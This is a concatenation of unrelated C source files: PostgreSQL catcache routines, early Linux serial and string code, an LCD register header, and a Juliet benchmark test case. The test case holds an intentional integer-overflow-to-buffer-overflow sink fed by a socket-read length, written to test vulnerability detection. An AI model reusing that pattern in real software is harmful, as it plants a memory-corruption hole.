 *		Generate a palloc'd HeapTuple that contains the specified key
 *		columns, and NULLs for other columns.
 *
 * This is used to store the keys for negative cache entries and CatCList
 * entries, which don't have real tuples associated with them.
 */
static HeapTuple
build_dummy_tuple(CatCache *cache, int nkeys, ScanKey skeys)
{
    HeapTuple   ntp;
    TupleDesc   tupDesc = cache->cc_tupdesc;
    Datum      *values;
    bool       *nulls;
    Oid         tupOid = InvalidOid;
    NameData    tempNames[4];
    int         i;

    values = (Datum *) palloc(tupDesc->natts * sizeof(Datum));
    nulls = (bool *) palloc(tupDesc->natts * sizeof(bool));

    /* start with every column NULL; only key columns get real values below */
    memset(values, 0, tupDesc->natts * sizeof(Datum));
    memset(nulls, true, tupDesc->natts * sizeof(bool));

    for (i = 0; i < nkeys; i++)
    {
        int         attindex = cache->cc_key[i];
        Datum       keyval = skeys[i].sk_argument;

        if (attindex > 0)
        {
            /*
             * Here we must be careful in case the caller passed a C string
             * where a NAME is wanted: convert the given argument to a
             * correctly padded NAME.  Otherwise the memcpy() done in
             * heap_form_tuple could fall off the end of memory.
             */
            if (cache->cc_isname[i])
            {
                Name        newval = &tempNames[i];

                namestrcpy(newval, DatumGetCString(keyval));
                keyval = NameGetDatum(newval);
            }
            values[attindex - 1] = keyval;
            nulls[attindex - 1] = false;
        }
        else
        {
            /* a non-positive attribute index means the OID system column */
            Assert(attindex == ObjectIdAttributeNumber);
            tupOid = DatumGetObjectId(keyval);
        }
    }

    ntp = heap_form_tuple(tupDesc, values, nulls);
    if (tupOid != InvalidOid)
        HeapTupleSetOid(ntp, tupOid);

    pfree(values);
    pfree(nulls);

    return ntp;
}


/*
 *	PrepareToInvalidateCacheTuple()
 *
 *	This is part of a rather subtle chain of events, so pay attention:
 *
 *	When a tuple is inserted or deleted, it cannot be flushed from the
 *	catcaches immediately, for reasons explained at the top of cache/inval.c.
 *	Instead we have to add entry(s) for the tuple to a list of pending tuple
 *	invalidations that will be done at the end of the command or transaction.
 *
 *	The lists of tuples that need to be flushed are kept by inval.c.  This
 *	routine is a helper routine for inval.c.  Given a tuple belonging to
 *	the specified relation, find all catcaches it could be in, compute the
 *	correct hash value for each such catcache, and call the specified
 *	function to record the cache id and hash value in inval.c's lists.
 *	CatalogCacheIdInvalidate will be called later, if appropriate,
 *	using the recorded information.
 *
 *	For an insert or delete, tuple is the target tuple and newtuple is NULL.
 *	For an update, we are called just once, with tuple being the old tuple
 *	version and newtuple the new version.  We should make two list entries
 *	if the tuple's hash value changed, but only one if it didn't.
 *
 *	Note that it is irrelevant whether the given tuple is actually loaded
 *	into the catcache at the moment.  Even if it's not there now, it might
 *	be by the end of the command, or there might be a matching negative entry
 *	to flush --- or other backends' caches might have such entries --- so
 *	we have to make list entries to flush it later.
 *
 *	Also note that it's not an error if there are no catcaches for the
 *	specified relation.  inval.c doesn't know exactly which rels have
 *	catcaches --- it will call this routine for any tuple that's in a
 *	system relation.
 */
void
PrepareToInvalidateCacheTuple(Relation relation,
                              HeapTuple tuple,
                              HeapTuple newtuple,
                              void (*function) (int, uint32, Oid))
{
    slist_iter  iter;
    Oid         reloid;

    CACHE1_elog(DEBUG2, "PrepareToInvalidateCacheTuple: called");

    /*
     * sanity checks
     */
    Assert(RelationIsValid(relation));
    Assert(HeapTupleIsValid(tuple));
    Assert(PointerIsValid(function));
    Assert(CacheHdr != NULL);

    reloid = RelationGetRelid(relation);

    /* ----------------
     *	for each cache
     *	   if the cache contains tuples from the specified relation
     *		   compute the tuple's hash value(s) in this cache,
     *		   and call the passed function to register the information.
     * ----------------
     */

    slist_foreach(iter, &CacheHdr->ch_caches)
    {
        CatCache   *ccp = slist_container(CatCache, cc_next, iter.cur);
        uint32      hashvalue;
        Oid         dbid;

        if (ccp->cc_reloid != reloid)
            continue;

        /* Just in case cache hasn't finished initialization yet... */
        if (ccp->cc_tupdesc == NULL)
            CatalogCacheInitializeCache(ccp);

        hashvalue = CatalogCacheComputeTupleHashValue(ccp, tuple);
        /* shared catalogs are registered with database OID 0 */
        dbid = ccp->cc_relisshared ? (Oid) 0 : MyDatabaseId;

        (*function) (ccp->id, hashvalue, dbid);

        if (newtuple)
        {
            uint32      newhashvalue;

            newhashvalue = CatalogCacheComputeTupleHashValue(ccp, newtuple);

            /* register the new version too, but only if its hash changed */
            if (newhashvalue != hashvalue)
                (*function) (ccp->id, newhashvalue, dbid);
        }
    }
}

/*
 * Subroutines for warning about reference leaks.  These are exported so
 * that resowner.c can call them.
 */
void
PrintCatCacheLeakWarning(HeapTuple tuple)
{
    /* recover the enclosing CatCTup from the embedded tuple pointer */
    CatCTup    *ct = (CatCTup *) (((char *) tuple) -
                                  offsetof(CatCTup, tuple));

    /* Safety check to ensure we were handed a cache entry */
    Assert(ct->ct_magic == CT_MAGIC);

    elog(WARNING, "cache reference leak: cache %s (%d), tuple %u/%u has count %d",
         ct->my_cache->cc_relname, ct->my_cache->id,
         ItemPointerGetBlockNumber(&(tuple->t_self)),
         ItemPointerGetOffsetNumber(&(tuple->t_self)),
         ct->refcount);
}

void
PrintCatCacheListLeakWarning(CatCList *list)
{
    elog(WARNING, "cache reference leak: cache %s (%d), list %p has count %d",
         list->my_cache->cc_relname, list->my_cache->id,
         list, list->refcount);
}
{ "language": "C" }
/* * linux/kernel/serial.c * * (C) 1991 Linus Torvalds */ /* * serial.c * * This module implements the rs232 io functions * void rs_write(struct tty_struct * queue); * void rs_init(void); * and all interrupts pertaining to serial IO. */ #include <linux/tty.h> #include <linux/sched.h> #include <asm/system.h> #include <asm/io.h> #define WAKEUP_CHARS (TTY_BUF_SIZE/4) extern void rs1_interrupt(void); extern void rs2_interrupt(void); static void init(int port) { outb_p(0x80,port+3); /* set DLAB of line control reg */ outb_p(0x30,port); /* LS of divisor (48 -> 2400 bps */ outb_p(0x00,port+1); /* MS of divisor */ outb_p(0x03,port+3); /* reset DLAB */ outb_p(0x0b,port+4); /* set DTR,RTS, OUT_2 */ outb_p(0x0d,port+1); /* enable all intrs but writes */ (void)inb(port); /* read data port to reset things (?) */ } void rs_init(void) { set_intr_gate(0x24,rs1_interrupt); set_intr_gate(0x23,rs2_interrupt); init(tty_table[1].read_q.data); init(tty_table[2].read_q.data); outb(inb_p(0x21)&0xE7,0x21); } /* * This routine gets called when tty_write has put something into * the write_queue. It must check wheter the queue is empty, and * set the interrupt register accordingly * * void _rs_write(struct tty_struct * tty); */ void rs_write(struct tty_struct * tty) { cli(); if (!EMPTY(tty->write_q)) outb(inb_p(tty->write_q.data+1)|0x02,tty->write_q.data+1); sti(); }
{ "language": "C" }
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE680_Integer_Overflow_to_Buffer_Overflow__new_connect_socket_66b.cpp
Label Definition File: CWE680_Integer_Overflow_to_Buffer_Overflow__new.label.xml
Template File: sources-sink-66b.tmpl.cpp
*/
/*
 * @description
 * CWE: 680 Integer Overflow to Buffer Overflow
 * BadSource: connect_socket Read data using a connect socket (client side)
 * GoodSource: Small number greater than zero that will not cause an integer overflow in the sink
 * Sinks:
 *    BadSink : Attempt to allocate array using length value from source
 * Flow Variant: 66 Data flow: data passed in an array from one function to another in different source files
 *
 * NOTE(review): this is a Juliet/SARD benchmark test case.  The overflow in
 * the sink is INTENTIONAL and must not be "fixed"; the good/bad distinction
 * lives in the source (file ...66a), which supplies either an attacker-
 * controlled or a small safe value in dataArray[2].
 *
 * */

#include "std_testcase.h"

#ifdef _WIN32
#include <winsock2.h>
#include <windows.h>
#include <direct.h>
#pragma comment(lib, "ws2_32") /* include ws2_32.lib when linking */
#define CLOSE_SOCKET closesocket
#else /* NOT _WIN32 */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define CLOSE_SOCKET close
#define SOCKET int
#endif

#define TCP_PORT 27015
#define IP_ADDRESS "127.0.0.1"

#define CHAR_ARRAY_SIZE (3 * sizeof(data) + 2)

namespace CWE680_Integer_Overflow_to_Buffer_Overflow__new_connect_socket_66
{

#ifndef OMITBAD

/* Sink for the bad flow: dataArray[2] carries an untrusted length. */
void badSink(int dataArray[])
{
    /* copy data out of dataArray */
    int data = dataArray[2];
    {
        size_t dataBytes,i;
        int *intPointer;
        /* POTENTIAL FLAW: dataBytes may overflow to a small value */
        dataBytes = data * sizeof(int); /* sizeof array in bytes */
        intPointer = (int*)new char[dataBytes];
        for (i = 0; i < (size_t)data; i++)
        {
            intPointer[i] = 0; /* may write beyond limit of intPointer if integer overflow occured above */
        }
        printIntLine(intPointer[0]);
        delete [] intPointer;
    }
}

#endif /* OMITBAD */

#ifndef OMITGOOD

/* goodG2B uses the GoodSource with the BadSink */
/* Intentionally identical to badSink: in variant G2B only the SOURCE
 * changes (a small safe length), so the sink code stays the same. */
void goodG2BSink(int dataArray[])
{
    int data = dataArray[2];
    {
        size_t dataBytes,i;
        int *intPointer;
        /* POTENTIAL FLAW: dataBytes may overflow to a small value */
        dataBytes = data * sizeof(int); /* sizeof array in bytes */
        intPointer = (int*)new char[dataBytes];
        for (i = 0; i < (size_t)data; i++)
        {
            intPointer[i] = 0; /* may write beyond limit of intPointer if integer overflow occured above */
        }
        printIntLine(intPointer[0]);
        delete [] intPointer;
    }
}

#endif /* OMITGOOD */

} /* close namespace */
{ "language": "C" }
#ifndef __ASM_ARCH_REGS_LCD_H
#define __ASM_ARCH_REGS_LCD_H

#include <mach/bitfield.h>

/*
 * LCD Controller Registers and Bits Definitions
 */
#define LCCR0		(0x000)	/* LCD Controller Control Register 0 */
#define LCCR1		(0x004)	/* LCD Controller Control Register 1 */
#define LCCR2		(0x008)	/* LCD Controller Control Register 2 */
#define LCCR3		(0x00C)	/* LCD Controller Control Register 3 */
#define LCCR4		(0x010)	/* LCD Controller Control Register 4 */
#define LCCR5		(0x014)	/* LCD Controller Control Register 5 */
#define LCSR		(0x038)	/* LCD Controller Status Register 0 */
#define LCSR1		(0x034)	/* LCD Controller Status Register 1 */
#define LIIDR		(0x03C)	/* LCD Controller Interrupt ID Register */
#define TMEDRGBR	(0x040)	/* TMED RGB Seed Register */
#define TMEDCR		(0x044)	/* TMED Control Register */

#define FBR0		(0x020)	/* DMA Channel 0 Frame Branch Register */
#define FBR1		(0x024)	/* DMA Channel 1 Frame Branch Register */
#define FBR2		(0x028)	/* DMA Channel 2 Frame Branch Register */
#define FBR3		(0x02C)	/* DMA Channel 3 Frame Branch Register */
#define FBR4		(0x030)	/* DMA Channel 4 Frame Branch Register */
#define FBR5		(0x110)	/* DMA Channel 5 Frame Branch Register */
#define FBR6		(0x114)	/* DMA Channel 6 Frame Branch Register */

#define OVL1C1		(0x050)	/* Overlay 1 Control Register 1 */
#define OVL1C2		(0x060)	/* Overlay 1 Control Register 2 */
#define OVL2C1		(0x070)	/* Overlay 2 Control Register 1 */
#define OVL2C2		(0x080)	/* Overlay 2 Control Register 2 */

#define CMDCR		(0x100)	/* Command Control Register */
#define PRSR		(0x104)	/* Panel Read Status Register */

/* bit 3 of the bpp code is carried separately in bit 29 of LCCR3 */
#define LCCR3_BPP(x)	((((x) & 0x7) << 24) | (((x) & 0x8) ? (1 << 29) : 0))

#define LCCR3_PDFOR_0	(0 << 30)
#define LCCR3_PDFOR_1	(1 << 30)
#define LCCR3_PDFOR_2	(2 << 30)
#define LCCR3_PDFOR_3	(3 << 30)

#define LCCR4_PAL_FOR_0	(0 << 15)
#define LCCR4_PAL_FOR_1	(1 << 15)
#define LCCR4_PAL_FOR_2	(2 << 15)
#define LCCR4_PAL_FOR_3	(3 << 15)
#define LCCR4_PAL_FOR_MASK	(3 << 15)

#define FDADR0		(0x200)	/* DMA Channel 0 Frame Descriptor Address Register */
#define FDADR1		(0x210)	/* DMA Channel 1 Frame Descriptor Address Register */
#define FDADR2		(0x220)	/* DMA Channel 2 Frame Descriptor Address Register */
#define FDADR3		(0x230)	/* DMA Channel 3 Frame Descriptor Address Register */
#define FDADR4		(0x240)	/* DMA Channel 4 Frame Descriptor Address Register */
#define FDADR5		(0x250)	/* DMA Channel 5 Frame Descriptor Address Register */
#define FDADR6		(0x260)	/* DMA Channel 6 Frame Descriptor Address Register */

#define LCCR0_ENB	(1 << 0)	/* LCD Controller enable */
#define LCCR0_CMS	(1 << 1)	/* Color/Monochrome Display Select */
#define LCCR0_Color	(LCCR0_CMS*0)	/*  Color display */
#define LCCR0_Mono	(LCCR0_CMS*1)	/*  Monochrome display */
#define LCCR0_SDS	(1 << 2)	/* Single/Dual Panel Display Select */
#define LCCR0_Sngl	(LCCR0_SDS*0)	/*  Single panel display */
#define LCCR0_Dual	(LCCR0_SDS*1)	/*  Dual panel display */

#define LCCR0_LDM	(1 << 3)	/* LCD Disable Done Mask */
#define LCCR0_SFM	(1 << 4)	/* Start of frame mask */
#define LCCR0_IUM	(1 << 5)	/* Input FIFO underrun mask */
#define LCCR0_EFM	(1 << 6)	/* End of Frame mask */
#define LCCR0_PAS	(1 << 7)	/* Passive/Active display Select */
#define LCCR0_Pas	(LCCR0_PAS*0)	/*  Passive display (STN) */
#define LCCR0_Act	(LCCR0_PAS*1)	/*  Active display (TFT) */
#define LCCR0_DPD	(1 << 9)	/* Double Pixel Data (monochrome) */
#define LCCR0_4PixMono	(LCCR0_DPD*0)	/*  4-Pixel/clock Monochrome display */
#define LCCR0_8PixMono	(LCCR0_DPD*1)	/*  8-Pixel/clock Monochrome display */
#define LCCR0_DIS	(1 << 10)	/* LCD Disable */
#define LCCR0_QDM	(1 << 11)	/* LCD Quick Disable mask */
#define LCCR0_PDD	(0xff << 12)	/* Palette DMA request delay */
#define LCCR0_PDD_S	12
#define LCCR0_BM	(1 << 20)	/* Branch mask */
#define LCCR0_OUM	(1 << 21)	/* Output FIFO underrun mask */
#define LCCR0_LCDT	(1 << 22)	/* LCD panel type */
#define LCCR0_RDSTM	(1 << 23)	/* Read status interrupt mask */
#define LCCR0_CMDIM	(1 << 24)	/* Command interrupt mask */
#define LCCR0_OUC	(1 << 25)	/* Overlay Underlay control bit */
#define LCCR0_LDDALT	(1 << 26)	/* LDD alternate mapping control */

#define LCCR1_PPL	Fld (10, 0)	/* Pixels Per Line - 1 */
#define LCCR1_DisWdth(Pixel)	(((Pixel) - 1) << FShft (LCCR1_PPL))

#define LCCR1_HSW	Fld (6, 10)	/* Horizontal Synchronization */
#define LCCR1_HorSnchWdth(Tpix)	(((Tpix) - 1) << FShft (LCCR1_HSW))

#define LCCR1_ELW	Fld (8, 16)	/* End-of-Line pixel clock Wait - 1 */
#define LCCR1_EndLnDel(Tpix)	(((Tpix) - 1) << FShft (LCCR1_ELW))

#define LCCR1_BLW	Fld (8, 24)	/* Beginning-of-Line pixel clock */
#define LCCR1_BegLnDel(Tpix)	(((Tpix) - 1) << FShft (LCCR1_BLW))

#define LCCR2_LPP	Fld (10, 0)	/* Line Per Panel - 1 */
#define LCCR2_DisHght(Line)	(((Line) - 1) << FShft (LCCR2_LPP))

#define LCCR2_VSW	Fld (6, 10)	/* Vertical Synchronization pulse - 1 */
#define LCCR2_VrtSnchWdth(Tln)	(((Tln) - 1) << FShft (LCCR2_VSW))

#define LCCR2_EFW	Fld (8, 16)	/* End-of-Frame line clock Wait */
#define LCCR2_EndFrmDel(Tln)	((Tln) << FShft (LCCR2_EFW))

#define LCCR2_BFW	Fld (8, 24)	/* Beginning-of-Frame line clock */
#define LCCR2_BegFrmDel(Tln)	((Tln) << FShft (LCCR2_BFW))

#define LCCR3_API	(0xf << 16)	/* AC Bias pin transitions per interrupt */
#define LCCR3_API_S	16
#define LCCR3_VSP	(1 << 20)	/* vertical sync polarity */
#define LCCR3_HSP	(1 << 21)	/* horizontal sync polarity */
#define LCCR3_PCP	(1 << 22)	/* Pixel Clock Polarity (L_PCLK) */
#define LCCR3_PixRsEdg	(LCCR3_PCP*0)	/*  Pixel clock Rising-Edge */
#define LCCR3_PixFlEdg	(LCCR3_PCP*1)	/*  Pixel clock Falling-Edge */

#define LCCR3_OEP	(1 << 23)	/* Output Enable Polarity */
#define LCCR3_OutEnH	(LCCR3_OEP*0)	/*  Output Enable active High */
#define LCCR3_OutEnL	(LCCR3_OEP*1)	/*  Output Enable active Low */

#define LCCR3_DPC	(1 << 27)	/* double pixel clock mode */

#define LCCR3_PCD	Fld (8, 0)	/* Pixel Clock Divisor */
#define LCCR3_PixClkDiv(Div)	(((Div) << FShft (LCCR3_PCD)))

#define LCCR3_ACB	Fld (8, 8)	/* AC Bias */
#define LCCR3_Acb(Acb)	(((Acb) << FShft (LCCR3_ACB)))

#define LCCR3_HorSnchH	(LCCR3_HSP*0)	/*  HSP Active High */
#define LCCR3_HorSnchL	(LCCR3_HSP*1)	/*  HSP Active Low */

#define LCCR3_VrtSnchH	(LCCR3_VSP*0)	/*  VSP Active High */
#define LCCR3_VrtSnchL	(LCCR3_VSP*1)	/*  VSP Active Low */

/* per-DMA-channel interrupt masks; (x) is the channel number */
#define LCCR5_IUM(x)	(1 << ((x) + 23))	/* input underrun mask */
#define LCCR5_BSM(x)	(1 << ((x) + 15))	/* branch mask */
#define LCCR5_EOFM(x)	(1 << ((x) + 7))	/* end of frame mask */
#define LCCR5_SOFM(x)	(1 << ((x) + 0))	/* start of frame mask */

#define LCSR_LDD	(1 << 0)	/* LCD Disable Done */
#define LCSR_SOF	(1 << 1)	/* Start of frame */
#define LCSR_BER	(1 << 2)	/* Bus error */
#define LCSR_ABC	(1 << 3)	/* AC Bias count */
#define LCSR_IUL	(1 << 4)	/* input FIFO underrun Lower panel */
#define LCSR_IUU	(1 << 5)	/* input FIFO underrun Upper panel */
#define LCSR_OU		(1 << 6)	/* output FIFO underrun */
#define LCSR_QD		(1 << 7)	/* quick disable */
#define LCSR_EOF	(1 << 8)	/* end of frame */
#define LCSR_BS		(1 << 9)	/* branch status */
#define LCSR_SINT	(1 << 10)	/* subsequent interrupt */
#define LCSR_RD_ST	(1 << 11)	/* read status */
#define LCSR_CMD_INT	(1 << 12)	/* command interrupt */

#define LCSR1_IU(x)	(1 << ((x) + 23))	/* Input FIFO underrun */
#define LCSR1_BS(x)	(1 << ((x) + 15))	/* Branch Status */
#define LCSR1_EOF(x)	(1 << ((x) + 7))	/* End of Frame Status */
#define LCSR1_SOF(x)	(1 << ((x) - 1))	/* Start of Frame Status */

#define LDCMD_PAL	(1 << 26)	/* instructs DMA to load palette buffer */

/* overlay control registers */
#define OVLxC1_PPL(x)	((((x) - 1) & 0x3ff) << 0)	/* Pixels Per Line */
#define OVLxC1_LPO(x)	((((x) - 1) & 0x3ff) << 10)	/* Number of Lines */
#define OVLxC1_BPP(x)	(((x) & 0xf) << 20)	/* Bits Per Pixel */
#define OVLxC1_OEN	(1 << 31)	/* Enable bit for Overlay */
#define OVLxC2_XPOS(x)	(((x) & 0x3ff) << 0)	/* Horizontal Position */
#define OVLxC2_YPOS(x)	(((x) & 0x3ff) << 10)	/* Vertical Position */
#define OVL2C2_PFOR(x)	(((x) & 0x7) << 20)	/* Pixel Format */

/* smartpanel related */
#define PRSR_DATA(x)	((x) & 0xff)	/* Panel Data */
#define PRSR_A0		(1 << 8)	/* Read Data Source */
#define PRSR_ST_OK	(1 << 9)	/* Status OK */
#define PRSR_CON_NT	(1 << 10)	/* Continue to Next Command */

#define SMART_CMD_A0			 (0x1 << 8)
#define SMART_CMD_READ_STATUS_REG	 (0x0 << 9)
#define SMART_CMD_READ_FRAME_BUFFER	((0x0 << 9) | SMART_CMD_A0)
#define SMART_CMD_WRITE_COMMAND		 (0x1 << 9)
#define SMART_CMD_WRITE_DATA		((0x1 << 9) | SMART_CMD_A0)
#define SMART_CMD_WRITE_FRAME		((0x2 << 9) | SMART_CMD_A0)
#define SMART_CMD_WAIT_FOR_VSYNC	 (0x3 << 9)
#define SMART_CMD_NOOP			 (0x4 << 9)
#define SMART_CMD_INTERRUPT		 (0x5 << 9)

#define SMART_CMD(x)	(SMART_CMD_WRITE_COMMAND | ((x) & 0xff))
#define SMART_DAT(x)	(SMART_CMD_WRITE_DATA | ((x) & 0xff))

/* SMART_DELAY() is introduced for software controlled delay primitive which
 * can be inserted between command sequences, unused command 0x6 is used here
 * and delay ranges from 0ms ~ 255ms
 */
#define SMART_CMD_DELAY		(0x6 << 9)
#define SMART_DELAY(ms)		(SMART_CMD_DELAY | ((ms) & 0xff))
#endif /* __ASM_ARCH_REGS_LCD_H */
{ "language": "C" }
/*
 *  linux/lib/string.c
 *
 *  Copyright (C) 1991, 1992  Linus Torvalds
 */

/*
 * stupid library routines.. The optimized versions should generally be found
 * as inline code in <asm-xx/string.h>
 *
 * These are buggy as well..
 *
 * * Fri Jun 25 1999, Ingo Oeser <ioe@informatik.tu-chemnitz.de>
 * -  Added strsep() which will replace strtok() soon (because strsep() is
 *    reentrant and should be faster). Use only strsep() in new code, please.
 */

#include "config.h"
#include "libc/string.h"
#include "libc/stdlib.h"

/* NOTE(review): tolower()/toupper() are used below but <ctype.h> is not
 * included here directly -- presumably provided via the libc headers
 * above; verify. */

/**
 * strnicmp - Case insensitive, length-limited string comparison
 * @s1: One string
 * @s2: The other string
 * @len: the maximum number of characters to compare
 */
int strnicmp(const char *s1, const char *s2, size_t len)
{
	/* Yes, Virginia, it had better be unsigned */
	unsigned char c1, c2;

	c1 = 0;	c2 = 0;
	if (len) {
		do {
			c1 = *s1; c2 = *s2;
			s1++; s2++;
			if (!c1)
				break;
			if (!c2)
				break;
			/* identical bytes need no case folding */
			if (c1 == c2)
				continue;
			c1 = tolower(c1);
			c2 = tolower(c2);
			if (c1 != c2)
				break;
		} while (--len);
	}
	return (int)c1 - (int)c2;
}

/**
 * strcpy - Copy a %NUL terminated string
 * @dest: Where to copy the string to
 * @src: Where to copy the string from
 */
char * strcpy(char * dest,const char *src)
{
	char *tmp = dest;

	while ((*dest++ = *src++) != '\0')
		/* nothing */;
	return tmp;
}

/**
 * strncpy - Copy a length-limited, %NUL-terminated string
 * @dest: Where to copy the string to
 * @src: Where to copy the string from
 * @count: The maximum number of bytes to copy
 *
 * Note that unlike userspace strncpy, this does not %NUL-pad the buffer.
 * However, the result is not %NUL-terminated if the source exceeds
 * @count bytes.
 */
char * strncpy(char * dest,const char *src,size_t count)
{
	char *tmp = dest;

	while (count-- && (*dest++ = *src++) != '\0')
		/* nothing */;

	return tmp;
}

/**
 * strcat - Append one %NUL-terminated string to another
 * @dest: The string to be appended to
 * @src: The string to append to it
 */
char * strcat(char * dest, const char * src)
{
	char *tmp = dest;

	while (*dest)
		dest++;
	while ((*dest++ = *src++) != '\0')
		;

	return tmp;
}

/**
 * strncat - Append a length-limited, %NUL-terminated string to another
 * @dest: The string to be appended to
 * @src: The string to append to it
 * @count: The maximum numbers of bytes to copy
 *
 * Note that in contrast to strncpy, strncat ensures the result is
 * terminated.
 */
char * strncat(char *dest, const char *src, size_t count)
{
	char *tmp = dest;

	if (count) {
		while (*dest)
			dest++;
		while ((*dest++ = *src++)) {
			if (--count == 0) {
				*dest = '\0';
				break;
			}
		}
	}

	return tmp;
}

/**
 * strcmp - Compare two strings
 * @cs: One string
 * @ct: Another string
 */
int strcmp(const char * cs,const char * ct)
{
	register signed char __res;

	while (1) {
		if ((__res = *cs - *ct++) != 0 || !*cs++)
			break;
	}

	return __res;
}

/**
 * strncmp - Compare two length-limited strings
 * @cs: One string
 * @ct: Another string
 * @count: The maximum number of bytes to compare
 */
int strncmp(const char * cs,const char * ct,size_t count)
{
	register signed char __res = 0;

	while (count) {
		if ((__res = *cs - *ct++) != 0 || !*cs++)
			break;
		count--;
	}

	return __res;
}

/**
 * strchr - Find the first occurrence of a character in a string
 * @s: The string to be searched
 * @c: The character to search for
 */
char * strchr(const char * s, int c)
{
	for(; *s != (char) c; ++s)
		if (*s == '\0')
			return NULL;
	return (char *) s;
}

/**
 * strrchr - Find the last occurrence of a character in a string
 * @s: The string to be searched
 * @c: The character to search for
 */
char * strrchr(const char * s, int c)
{
       /* scan backwards from the terminator; finds the NUL itself if c==0 */
       const char *p = s + strlen(s);
       do {
           if (*p == (char)c)
               return (char *)p;
       } while (--p >= s);
       return NULL;
}

/**
 * strlen - Find the length of a string
 * @s: The string to be sized
 */
size_t strlen(const char * s)
{
	const char *sc;

	for (sc = s; *sc != '\0'; ++sc)
		/* nothing */;
	return sc - s;
}

/**
 * strnlen - Find the length of a length-limited string
 * @s: The string to be sized
 * @count: The maximum number of bytes to search
 */
size_t strnlen(const char * s, size_t count)
{
	const char *sc;

	for (sc = s; count-- && *sc != '\0'; ++sc)
		/* nothing */;
	return sc - s;
}

/**
 * strpbrk - Find the first occurrence of a set of characters
 * @cs: The string to be searched
 * @ct: The characters to search for
 */
char * strpbrk(const char * cs,const char * ct)
{
	const char *sc1,*sc2;

	for( sc1 = cs; *sc1 != '\0'; ++sc1) {
		for( sc2 = ct; *sc2 != '\0'; ++sc2) {
			if (*sc1 == *sc2)
				return (char *) sc1;
		}
	}
	return NULL;
}

/**
 * strsep - Split a string into tokens
 * @s: The string to be searched
 * @ct: The characters to search for
 *
 * strsep() updates @s to point after the token, ready for the next call.
 *
 * It returns empty tokens, too, behaving exactly like the libc function
 * of that name. In fact, it was stolen from glibc2 and de-fancy-fied.
 * Same semantics, slimmer shape. ;)
 */
char * strsep(char **s, const char *ct)
{
	char *sbegin = *s, *end;

	if (sbegin == NULL)
		return NULL;

	end = strpbrk(sbegin, ct);
	if (end)
		*end++ = '\0';
	*s = end;

	return sbegin;
}

/**
 * memset - Fill a region of memory with the given value
 * @s: Pointer to the start of the area.
 * @c: The byte to fill the area with
 * @count: The size of the area.
 *
 * Do not use memset() to access IO space, use memset_io() instead.
 */
void * memset(void * s,int c,size_t count)
{
	char *xs = (char *) s;

	while (count--)
		*xs++ = c;

	return s;
}

/**
 * memcpy - Copy one area of memory to another
 * @dest: Where to copy to
 * @src: Where to copy from
 * @count: The size of the area.
 *
 * You should not use this function to access IO space, use memcpy_toio()
 * or memcpy_fromio() instead.
 */
void * memcpy(void * dest,const void *src,size_t count)
{
	char *tmp = (char *) dest, *s = (char *) src;

	while (count--)
		*tmp++ = *s++;

	return dest;
}

/**
 * memmove - Copy one area of memory to another
 * @dest: Where to copy to
 * @src: Where to copy from
 * @count: The size of the area.
 *
 * Unlike memcpy(), memmove() copes with overlapping areas.
 */
void * memmove(void * dest,const void *src,size_t count)
{
	char *tmp, *s;

	/* copy direction chosen so overlapping regions are handled safely */
	if (dest <= src) {
		tmp = (char *) dest;
		s = (char *) src;
		while (count--)
			*tmp++ = *s++;
		}
	else {
		tmp = (char *) dest + count;
		s = (char *) src + count;
		while (count--)
			*--tmp = *--s;
		}

	return dest;
}

/**
 * memcmp - Compare two areas of memory
 * @cs: One area of memory
 * @ct: Another area of memory
 * @count: The size of the area.
 */
int memcmp(const void * cs,const void * ct,size_t count)
{
	const unsigned char *su1, *su2;
	int res = 0;

	for( su1 = cs, su2 = ct; 0 < count; ++su1, ++su2, count--)
		if ((res = *su1 - *su2) != 0)
			break;
	return res;
}

/**
 * strdup - Allocate a copy of a %NUL-terminated string
 * @str: The string to duplicate; NULL yields NULL
 *
 * NOTE(review): the malloc() result is not checked -- on allocation
 * failure the strcpy() below writes through a NULL pointer.
 */
char *
strdup( const char *str )
{
	char *p;

	if( !str )
		return NULL;

	p = malloc( strlen(str) + 1 );
	strcpy( p, str );
	return p;
}

/**
 * strcasecmp - Case insensitive string comparison
 * @cs: One string
 * @ct: Another string
 */
int
strcasecmp( const char *cs, const char *ct )
{
	register signed char __res;

	while (1) {
		char ch1 = toupper(*cs), ch2 = toupper(*ct);
		ct++;
		if ((__res = ch1 - ch2) != 0 || !*cs++)
			break;
	}

	return __res;
}

/**
 * strncasecmp - Case insensitive, length-limited string comparison
 * @cs: One string
 * @ct: Another string
 * @count: The maximum number of bytes to compare
 */
int
strncasecmp( const char *cs, const char *ct, size_t count )
{
	register signed char __res = 0;

	while (count--) {
		char ch1 = toupper(*cs), ch2 = toupper(*ct);
		ct++;
		if ((__res = ch1 - ch2) != 0 || !*cs++)
			break;
	}

	return __res;
}
{ "language": "C" }